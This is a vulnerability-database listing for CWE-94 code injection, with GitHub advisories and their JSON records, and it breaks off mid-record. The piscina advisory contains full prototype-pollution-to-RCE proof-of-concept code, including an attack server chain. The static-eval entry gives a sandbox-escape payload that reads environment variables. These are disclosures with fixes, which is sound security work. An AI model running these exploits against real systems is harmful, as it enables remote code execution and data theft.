Common Weakness Enumeration

CWE-94

Allowed-with-Review

Improper Control of Generation of Code ('Code Injection')

Abstraction: Base · Status: Draft

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

8272 vulnerabilities reference this CWE, most recent first.

GHSA-X9G3-XRWR-CWFG

Vulnerability from github – Published: 2026-06-18 13:05 – Updated: 2026-06-18 13:05
VLAI
Summary
piscina: Prototype Pollution Gadget → RCE via inherited options.filename
Details

Summary

piscina's constructor and run() paths read the filename option via plain member access:

// dist/index.js line 92 (constructor)
const filename = options.filename
  ? (0, common_1.maybeFileURLToPath)(options.filename)
  : null;
this.options = { ...kDefaultOptions, ...options, filename, maxQueue: 0 };

// dist/index.js line 616 (run())
run(task, options = kDefaultRunOptions) {
    if (options === null || typeof options !== 'object') {
        return Promise.reject(new TypeError('options must be an object'));
    }
    const { transferList, filename, name, signal } = options;

Both reads fall through the prototype chain when the caller's options object doesn't have filename as an own property. When Object.prototype.filename is polluted upstream — by any of the well-documented PP-source CVEs (lodash<4.17.13, qs<6.10.3, set-value<4.1.0, minimist<1.2.6, deepmerge<4.2.2, and others) — the inherited value flows to worker_threads.Worker import and the attacker's .mjs runs in the worker.

Subtlety: calling pool.run(task) with no second arg uses kDefaultRunOptions which has filename: null as an OWN property — that path DOES NOT fire. The vulnerable shape is when the caller passes their own options object (commonly {signal: ac.signal} for abort support, {name: ...} for task labelling, etc.). These caller-built options objects inherit from Object.prototype unless the caller explicitly uses Object.create(null).

Impact

Two preconditions:

  1. Upstream PP-source somewhere in the process — common in transitive deps
  2. Attacker-controllable .mjs at a known filesystem path — realistic via upload endpoints, /tmp races, predictable node_modules paths, or supply-chain

Once both fire: - Every pool.run(task, opts) call across the entire process is hijacked - Attacker's exported function is called with the legitimate caller's task data — attacker reads per-request app data - Attacker controls the return value — caller receives worker_response.by = "ATTACKER-WORKER" and any other attacker-supplied response fields — attacker can poison return values to legitimate clients - Hijack persists until process restart

Strictly worse than the analogous pino chain because piscina actually invokes the attacker function with caller data on every dispatch (pino imports the attacker module once and errors out).

Affected versions

Empirically verified vulnerable on piscina@5.1.4 (latest stable at time of disclosure). The bug shape is in the constructor's options.filename read at line 92 of dist/index.js, present since the worker-pool API stabilized — likely all 3.x / 4.x / 5.x affected.

Proof of concept

A) Minimal in-process PoC

import fs from 'fs';

// 1) Drop the attacker module (any path the victim process can read)
fs.writeFileSync('/tmp/atk.mjs', `
  import fs from 'fs';
  fs.writeFileSync('/tmp/PISCINA_RCE_SENTINEL', JSON.stringify({
    rce: 'CONFIRMED', pid: process.pid, argv1: process.argv[1],
  }));
  export default function(arg) { return 'attacker-return-' + JSON.stringify(arg); }
`);

// 2) Upstream PP-source — pollute Object.prototype.filename
//    (representative of CVE-2019-10744 lodash<4.17.13, CVE-2022-24999 qs<6.10.3,
//     and ~30 historical PP-source CVEs)
const payload = JSON.parse('{"__proto__":{"filename":"/tmp/atk.mjs"}}');
function vulnMerge(t, s) {
  for (const k of Object.keys(s)) {
    if (s[k] !== null && typeof s[k] === 'object') {
      if (!t[k]) t[k] = {};
      vulnMerge(t[k], s[k]);
    } else t[k] = s[k];
  }
}
vulnMerge({}, payload);

// 3) Piscina with empty options inherits the polluted filename
const { Piscina } = await import('piscina');
const p = new Piscina({});                        // inherits filename
const result = await p.run({});                   // worker imports /tmp/atk.mjs
await p.destroy();

// 4) sentinel exists; attacker fn was called with task data
console.log(fs.readFileSync('/tmp/PISCINA_RCE_SENTINEL', 'utf8'));
console.log('attacker fn returned:', result);
// → "attacker-return-{}"

B) Full-stack HTTP chain (this is the realistic shape)

A correctly-initialized pool gets hijacked by attacker activity. Pool is created at server boot with a legitimate worker, then per-request handlers call pool.run(req.body, {signal: ac.signal}) — the standard abort-aware shape.

// === server.mjs ===
import express from 'express';
import { Piscina } from 'piscina';

// Vulnerable PP-source middleware (lodash<4.17.13 equivalent)
function vulnMerge(t, s) {
  for (const k of Object.keys(s)) {
    if (s[k] !== null && typeof s[k] === 'object') {
      if (!t[k]) t[k] = {};
      vulnMerge(t[k], s[k]);
    } else t[k] = s[k];
  }
}

// CORRECT pool init at boot
const pool = new Piscina({
  filename: './valid-worker.mjs',
  minThreads: 1, maxThreads: 2,
});

const config = {};
const app = express();

app.post('/api/settings', express.json(), (req, res) => {
  vulnMerge(config, req.body);                    // PP source
  res.json({ ok: true });
});

app.post('/api/process', express.json(), async (req, res) => {
  const ac = new AbortController();
  const result = await pool.run(req.body, { signal: ac.signal });  // <-- hijacked
  res.json({ ok: true, worker_response: result });
});

app.listen(7755);

// === Attacker, 3 HTTP requests ===
// POST /upload  → drops /tmp/atk.mjs
// POST /api/settings with body: {"__proto__":{"filename":"/tmp/atk.mjs"}}
// POST /api/process → pool.run() destructures filename via prototype
//                  → worker imports /tmp/atk.mjs
//                  → attacker fn called with req.body of THIS request
//                  → caller receives attacker-shaped response

Empirical observation on piscina@5.1.4 + Node 23.11.0: - Pre-attack /api/process returns {by: 'valid-worker'} - Cold-path /probe after PP source confirms ({}).filename is polluted process-wide - Post-attack /api/process returns {by: 'ATTACKER-WORKER', processed: <caller's exfil data>} - Sentinel file written from inside piscina/dist/worker.js with the worker process's uid + env access

Recommended fix

Minimal — own-property guard at both option-read sites:

// constructor (line 92)
const userFilename = Object.prototype.hasOwnProperty.call(options, 'filename')
  ? options.filename
  : null;
const filename = userFilename
  ? (0, common_1.maybeFileURLToPath)(userFilename)
  : null;

// run() (line 616)
const safeOpts = Object.create(null);
Object.assign(safeOpts, options);          // copies own props only? — keeps shape
const { transferList, filename, name, signal } = safeOpts;

More idiomatic — use a null-prototype working object throughout this.options:

const safeOpts = Object.create(null);
Object.assign(safeOpts, kDefaultOptions, options);
this.options = safeOpts;
this.options.filename = safeOpts.filename
  ? (0, common_1.maybeFileURLToPath)(safeOpts.filename)
  : null;
this.options.maxQueue = 0;

Either approach closes the gadget without breaking any legitimate caller pattern.

The pattern is the same as recommended for axios CVE-2026-44494 and the pino PSA filed earlier today. Cross-fix consideration: any other library you maintain that uses similar options.X member-access for worker / child-process / module-load operations is worth a quick audit.

Coordination

  • Same maintainer as pino — you're already in security-triage mode for that PSA. Happy to coordinate timing / disclosure dates across both.
  • Will not share publicly until GHSA published or 90 days.
  • Please credit ridingsa if you choose to credit a reporter.

How this was discovered

Generalized the pino disclosure's mechanism — any library that reads a string option via plain member access and dynamic-loads it (via import() / require() / new Worker()) is a candidate. Ran a sweep across 10 candidate libraries; piscina + fastify (via pino propagation) fired. Piscina is independently vulnerable through its own option-read sites, hence this separate disclosure.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.1.4"
      },
      "package": {
        "ecosystem": "npm",
        "name": "piscina"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-alpha.0"
            },
            {
              "fixed": "5.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.9.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "piscina"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.9.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "piscina"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0-rc.1"
            },
            {
              "fixed": "6.0.0-rc.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55388"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T13:05:11Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`piscina`\u0027s constructor and `run()` paths read the `filename` option via plain member access:\n\n```js\n// dist/index.js line 92 (constructor)\nconst filename = options.filename\n  ? (0, common_1.maybeFileURLToPath)(options.filename)\n  : null;\nthis.options = { ...kDefaultOptions, ...options, filename, maxQueue: 0 };\n\n// dist/index.js line 616 (run())\nrun(task, options = kDefaultRunOptions) {\n    if (options === null || typeof options !== \u0027object\u0027) {\n        return Promise.reject(new TypeError(\u0027options must be an object\u0027));\n    }\n    const { transferList, filename, name, signal } = options;\n```\n\nBoth reads fall through the prototype chain when the caller\u0027s options object doesn\u0027t have `filename` as an own property. When `Object.prototype.filename` is polluted upstream \u2014 by any of the well-documented PP-source CVEs (lodash\u003c4.17.13, qs\u003c6.10.3, set-value\u003c4.1.0, minimist\u003c1.2.6, deepmerge\u003c4.2.2, and others) \u2014 the inherited value flows to `worker_threads.Worker` import and the attacker\u0027s `.mjs` runs in the worker.\n\n**Subtlety**: calling `pool.run(task)` with no second arg uses `kDefaultRunOptions` which has `filename: null` as an OWN property \u2014 that path DOES NOT fire. The vulnerable shape is when the caller passes their own options object (commonly `{signal: ac.signal}` for abort support, `{name: ...}` for task labelling, etc.). These caller-built options objects inherit from `Object.prototype` unless the caller explicitly uses `Object.create(null)`.\n\n## Impact\n\nTwo preconditions:\n\n1. **Upstream PP-source** somewhere in the process \u2014 common in transitive deps\n2. **Attacker-controllable `.mjs`** at a known filesystem path \u2014 realistic via upload endpoints, /tmp races, predictable node_modules paths, or supply-chain\n\nOnce both fire:\n- Every `pool.run(task, opts)` call across the entire process is hijacked\n- Attacker\u0027s exported function is called with the legitimate caller\u0027s task data \u2014 **attacker reads per-request app data**\n- Attacker controls the return value \u2014 caller receives `worker_response.by = \"ATTACKER-WORKER\"` and any other attacker-supplied response fields \u2014 **attacker can poison return values to legitimate clients**\n- Hijack persists until process restart\n\nStrictly worse than the analogous pino chain because piscina actually *invokes* the attacker function with caller data on every dispatch (pino imports the attacker module once and errors out).\n\n## Affected versions\n\nEmpirically verified vulnerable on `piscina@5.1.4` (latest stable at time of disclosure). The bug shape is in the constructor\u0027s `options.filename` read at line 92 of `dist/index.js`, present since the worker-pool API stabilized \u2014 likely all 3.x / 4.x / 5.x affected.\n\n## Proof of concept\n\n### A) Minimal in-process PoC\n\n```js\nimport fs from \u0027fs\u0027;\n\n// 1) Drop the attacker module (any path the victim process can read)\nfs.writeFileSync(\u0027/tmp/atk.mjs\u0027, `\n  import fs from \u0027fs\u0027;\n  fs.writeFileSync(\u0027/tmp/PISCINA_RCE_SENTINEL\u0027, JSON.stringify({\n    rce: \u0027CONFIRMED\u0027, pid: process.pid, argv1: process.argv[1],\n  }));\n  export default function(arg) { return \u0027attacker-return-\u0027 + JSON.stringify(arg); }\n`);\n\n// 2) Upstream PP-source \u2014 pollute Object.prototype.filename\n//    (representative of CVE-2019-10744 lodash\u003c4.17.13, CVE-2022-24999 qs\u003c6.10.3,\n//     and ~30 historical PP-source CVEs)\nconst payload = JSON.parse(\u0027{\"__proto__\":{\"filename\":\"/tmp/atk.mjs\"}}\u0027);\nfunction vulnMerge(t, s) {\n  for (const k of Object.keys(s)) {\n    if (s[k] !== null \u0026\u0026 typeof s[k] === \u0027object\u0027) {\n      if (!t[k]) t[k] = {};\n      vulnMerge(t[k], s[k]);\n    } else t[k] = s[k];\n  }\n}\nvulnMerge({}, payload);\n\n// 3) Piscina with empty options inherits the polluted filename\nconst { Piscina } = await import(\u0027piscina\u0027);\nconst p = new Piscina({});                        // inherits filename\nconst result = await p.run({});                   // worker imports /tmp/atk.mjs\nawait p.destroy();\n\n// 4) sentinel exists; attacker fn was called with task data\nconsole.log(fs.readFileSync(\u0027/tmp/PISCINA_RCE_SENTINEL\u0027, \u0027utf8\u0027));\nconsole.log(\u0027attacker fn returned:\u0027, result);\n// \u2192 \"attacker-return-{}\"\n```\n\n### B) Full-stack HTTP chain (this is the realistic shape)\n\nA correctly-initialized pool gets hijacked by attacker activity. Pool is created at server boot with a legitimate worker, then per-request handlers call `pool.run(req.body, {signal: ac.signal})` \u2014 the standard abort-aware shape.\n\n```js\n// === server.mjs ===\nimport express from \u0027express\u0027;\nimport { Piscina } from \u0027piscina\u0027;\n\n// Vulnerable PP-source middleware (lodash\u003c4.17.13 equivalent)\nfunction vulnMerge(t, s) {\n  for (const k of Object.keys(s)) {\n    if (s[k] !== null \u0026\u0026 typeof s[k] === \u0027object\u0027) {\n      if (!t[k]) t[k] = {};\n      vulnMerge(t[k], s[k]);\n    } else t[k] = s[k];\n  }\n}\n\n// CORRECT pool init at boot\nconst pool = new Piscina({\n  filename: \u0027./valid-worker.mjs\u0027,\n  minThreads: 1, maxThreads: 2,\n});\n\nconst config = {};\nconst app = express();\n\napp.post(\u0027/api/settings\u0027, express.json(), (req, res) =\u003e {\n  vulnMerge(config, req.body);                    // PP source\n  res.json({ ok: true });\n});\n\napp.post(\u0027/api/process\u0027, express.json(), async (req, res) =\u003e {\n  const ac = new AbortController();\n  const result = await pool.run(req.body, { signal: ac.signal });  // \u003c-- hijacked\n  res.json({ ok: true, worker_response: result });\n});\n\napp.listen(7755);\n\n// === Attacker, 3 HTTP requests ===\n// POST /upload  \u2192 drops /tmp/atk.mjs\n// POST /api/settings with body: {\"__proto__\":{\"filename\":\"/tmp/atk.mjs\"}}\n// POST /api/process \u2192 pool.run() destructures filename via prototype\n//                  \u2192 worker imports /tmp/atk.mjs\n//                  \u2192 attacker fn called with req.body of THIS request\n//                  \u2192 caller receives attacker-shaped response\n```\n\nEmpirical observation on `piscina@5.1.4` + Node 23.11.0:\n- Pre-attack `/api/process` returns `{by: \u0027valid-worker\u0027}`\n- Cold-path `/probe` after PP source confirms `({}).filename` is polluted process-wide\n- Post-attack `/api/process` returns `{by: \u0027ATTACKER-WORKER\u0027, processed: \u003ccaller\u0027s exfil data\u003e}`\n- Sentinel file written from inside `piscina/dist/worker.js` with the worker process\u0027s uid + env access\n\n## Recommended fix\n\nMinimal \u2014 own-property guard at both option-read sites:\n\n```js\n// constructor (line 92)\nconst userFilename = Object.prototype.hasOwnProperty.call(options, \u0027filename\u0027)\n  ? options.filename\n  : null;\nconst filename = userFilename\n  ? (0, common_1.maybeFileURLToPath)(userFilename)\n  : null;\n\n// run() (line 616)\nconst safeOpts = Object.create(null);\nObject.assign(safeOpts, options);          // copies own props only? \u2014 keeps shape\nconst { transferList, filename, name, signal } = safeOpts;\n```\n\nMore idiomatic \u2014 use a null-prototype working object throughout `this.options`:\n\n```js\nconst safeOpts = Object.create(null);\nObject.assign(safeOpts, kDefaultOptions, options);\nthis.options = safeOpts;\nthis.options.filename = safeOpts.filename\n  ? (0, common_1.maybeFileURLToPath)(safeOpts.filename)\n  : null;\nthis.options.maxQueue = 0;\n```\n\nEither approach closes the gadget without breaking any legitimate caller pattern.\n\nThe pattern is the same as recommended for axios CVE-2026-44494 and the pino PSA filed earlier today. Cross-fix consideration: any other library you maintain that uses similar `options.X` member-access for worker / child-process / module-load operations is worth a quick audit.\n\n## Coordination\n\n- Same maintainer as pino \u2014 you\u0027re already in security-triage mode for that PSA. Happy to coordinate timing / disclosure dates across both.\n- Will not share publicly until GHSA published or 90 days.\n- Please credit `ridingsa` if you choose to credit a reporter.\n\n## How this was discovered\n\nGeneralized the pino disclosure\u0027s mechanism \u2014 any library that reads a string option via plain member access and dynamic-loads it (via `import()` / `require()` / `new Worker()`) is a candidate. Ran a sweep across 10 candidate libraries; piscina + fastify (via pino propagation) fired. Piscina is independently vulnerable through its own option-read sites, hence this separate disclosure.",
  "id": "GHSA-x9g3-xrwr-cwfg",
  "modified": "2026-06-18T13:05:11Z",
  "published": "2026-06-18T13:05:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/piscinajs/piscina"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "piscina: Prototype Pollution Gadget \u2192 RCE via inherited options.filename"
}

GHSA-X9HC-RW35-F44H

Vulnerability from github – Published: 2020-09-02 15:46 – Updated: 2021-09-27 13:40
VLAI
Summary
Sandbox Breakout / Arbitrary Code Execution in static-eval
Details

Versions of static-evalprior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src = process.argv[2];
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()'
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));

Recommendation

Upgrade to version 2.0.2 or later.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.0.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "static-eval"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:34:42Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Versions of `static-eval`prior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.\n\n## Proof of concept\n```\nvar evaluate = require(\u0027static-eval\u0027);\nvar parse = require(\u0027esprima\u0027).parse;\n\nvar src = process.argv[2];\nvar payload = \u0027(function({x}){return x.constructor})({x:\"\".sub})(\"console.log(process.env)\")()\u0027\nvar ast = parse(payload).body[0].expression;\nconsole.log(evaluate(ast, {x:1}));\n```\n\n\n## Recommendation\n\nUpgrade to version 2.0.2 or later.",
  "id": "GHSA-x9hc-rw35-f44h",
  "modified": "2021-09-27T13:40:52Z",
  "published": "2020-09-02T15:46:03Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://snyk.io/vuln/SNYK-JS-STATICEVAL-173693"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/758"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Sandbox Breakout / Arbitrary Code Execution in static-eval"
}

GHSA-X9JQ-VVH6-6MR6

Vulnerability from github – Published: 2022-05-14 02:33 – Updated: 2022-05-14 02:33
VLAI
Details

Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2013-3164"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2013-07-10T03:46:00Z",
    "severity": "HIGH"
  },
  "details": "Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Internet Explorer Memory Corruption Vulnerability.\"",
  "id": "GHSA-x9jq-vvh6-6mr6",
  "modified": "2022-05-14T02:33:56Z",
  "published": "2022-05-14T02:33:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-3164"
    },
    {
      "type": "WEB",
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-055"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A17376"
    },
    {
      "type": "WEB",
      "url": "http://www.us-cert.gov/ncas/alerts/TA13-190A"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-X9Q5-6P8Q-RXM7

Vulnerability from github – Published: 2022-05-14 01:02 – Updated: 2022-05-14 01:02
VLAI
Details

Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted Journal file, aka "Windows Journal Remote Code Execution Vulnerability," a different vulnerability than CVE-2015-1675, CVE-2015-1695, CVE-2015-1696, CVE-2015-1697, and CVE-2015-1698.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2015-1699"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2015-05-13T10:59:00Z",
    "severity": "HIGH"
  },
  "details": "Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted Journal file, aka \"Windows Journal Remote Code Execution Vulnerability,\" a different vulnerability than CVE-2015-1675, CVE-2015-1695, CVE-2015-1696, CVE-2015-1697, and CVE-2015-1698.",
  "id": "GHSA-x9q5-6p8q-rxm7",
  "modified": "2022-05-14T01:02:42Z",
  "published": "2022-05-14T01:02:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1699"
    },
    {
      "type": "WEB",
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-045"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1032280"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-X9Q6-973Q-X3JH

Vulnerability from github – Published: 2024-05-02 18:30 – Updated: 2024-08-13 21:31
VLAI
Details

An issue in Alfresco Content Services v.23.3.0.7 allows a remote attacker to execute arbitrary code via the Transfer Service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-29309"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-02T16:15:07Z",
    "severity": "HIGH"
  },
  "details": "An issue in Alfresco Content Services v.23.3.0.7 allows a remote attacker to execute arbitrary code via the Transfer Service.",
  "id": "GHSA-x9q6-973q-x3jh",
  "modified": "2024-08-13T21:31:55Z",
  "published": "2024-05-02T18:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29309"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/Siebene/c22e1a4a4a8b61067180475895e60858"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X9QG-QJQQ-Q3GJ

Vulnerability from github – Published: 2022-05-01 01:47 – Updated: 2025-04-03 04:09
VLAI
Details

PostgreSQL (pgsql) 7.4.x, 7.2.x, and other versions allows local users to load arbitrary shared libraries and execute code via the LOAD extension.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2005-0227"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2005-05-02T04:00:00Z",
    "severity": "MODERATE"
  },
  "details": "PostgreSQL (pgsql) 7.4.x, 7.2.x, and other versions allows local users to load arbitrary shared libraries and execute code via the LOAD extension.",
  "id": "GHSA-x9qg-qjqq-q3gj",
  "modified": "2025-04-03T04:09:53Z",
  "published": "2022-05-01T01:47:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-0227"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10234"
    },
    {
      "type": "WEB",
      "url": "http://archives.postgresql.org/pgsql-announce/2005-02/msg00000.php"
    },
    {
      "type": "WEB",
      "url": "http://archives.postgresql.org/pgsql-bugs/2005-01/msg00269.php"
    },
    {
      "type": "WEB",
      "url": "http://marc.info/?l=bugtraq\u0026m=110726899107148\u0026w=2"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/12948"
    },
    {
      "type": "WEB",
      "url": "http://security.gentoo.org/glsa/glsa-200502-08.xml"
    },
    {
      "type": "WEB",
      "url": "http://www.debian.org/security/2005/dsa-668"
    },
    {
      "type": "WEB",
      "url": "http://www.mandriva.com/security/advisories?name=MDKSA-2005:040"
    },
    {
      "type": "WEB",
      "url": "http://www.novell.com/linux/security/advisories/2005_36_sudo.html"
    },
    {
      "type": "WEB",
      "url": "http://www.redhat.com/support/errata/RHSA-2005-138.html"
    },
    {
      "type": "WEB",
      "url": "http://www.redhat.com/support/errata/RHSA-2005-150.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/12411"
    },
    {
      "type": "WEB",
      "url": "http://www.trustix.org/errata/2005/0003"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-X9WJ-2QC6-H283

Vulnerability from github – Published: 2022-05-01 18:27 – Updated: 2022-05-01 18:27
VLAI
Details

Multiple PHP remote file inclusion vulnerabilities in phpRealty 0.02 allow remote attackers to execute arbitrary PHP code via a URL in the MGR parameter to (1) index.php, (2) p_ins.php, and (3) u_ins.php in manager/admin/.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2007-4834"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2007-09-12T19:17:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple PHP remote file inclusion vulnerabilities in phpRealty 0.02 allow remote attackers to execute arbitrary PHP code via a URL in the MGR parameter to (1) index.php, (2) p_ins.php, and (3) u_ins.php in manager/admin/.",
  "id": "GHSA-x9wj-2qc6-h283",
  "modified": "2022-05-01T18:27:41Z",
  "published": "2022-05-01T18:27:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-4834"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36518"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/4387"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/37074"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/37075"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/37076"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/25610"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-XC2J-R478-F27M

Vulnerability from github – Published: 2022-05-01 18:37 – Updated: 2022-05-01 18:37
VLAI
Details

Direct static code injection vulnerability in dirsys/modules/config/post.php in JBC Explorer 7.20 RC1 and earlier allows remote authenticated administrators to inject arbitrary PHP code via the DEBUG parameter, which can be executed by accessing config.inc.php. NOTE: this can be exploited by unauthenticated remote attackers by leveraging CVE-2007-5913.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2007-5914"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2007-11-10T02:46:00Z",
    "severity": "MODERATE"
  },
  "details": "Direct static code injection vulnerability in dirsys/modules/config/post.php in JBC Explorer 7.20 RC1 and earlier allows remote authenticated administrators to inject arbitrary PHP code via the DEBUG parameter, which can be executed by accessing config.inc.php.  NOTE: this can be exploited by unauthenticated remote attackers by leveraging CVE-2007-5913.",
  "id": "GHSA-xc2j-r478-f27m",
  "modified": "2022-05-01T18:37:50Z",
  "published": "2022-05-01T18:37:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-5914"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/4608"
    },
    {
      "type": "WEB",
      "url": "http://mgsdl.free.fr/?1:33"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/42070"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/27533"
    },
    {
      "type": "WEB",
      "url": "http://securityreason.com/securityalert/3358"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/483268/100/0/threaded"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-XC3J-P373-XCMJ

Vulnerability from github – Published: 2022-05-02 00:03 – Updated: 2022-05-02 00:03
VLAI
Details

Eval injection vulnerability in globalsoff.php in Turnkey PHP Live Helper 2.0.1 and earlier allows remote attackers to execute arbitrary PHP code via the test parameter, and probably arbitrary parameters, to chat.php.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-3764"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2008-08-21T17:41:00Z",
    "severity": "HIGH"
  },
  "details": "Eval injection vulnerability in globalsoff.php in Turnkey PHP Live Helper 2.0.1 and earlier allows remote attackers to execute arbitrary PHP code via the test parameter, and probably arbitrary parameters, to chat.php.",
  "id": "GHSA-xc3j-p373-xcmj",
  "modified": "2022-05-02T00:03:22Z",
  "published": "2022-05-02T00:03:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-3764"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44571"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/6261"
    },
    {
      "type": "WEB",
      "url": "http://demos.turnkeywebtools.com/phplivehelper/docs/change_log.txt"
    },
    {
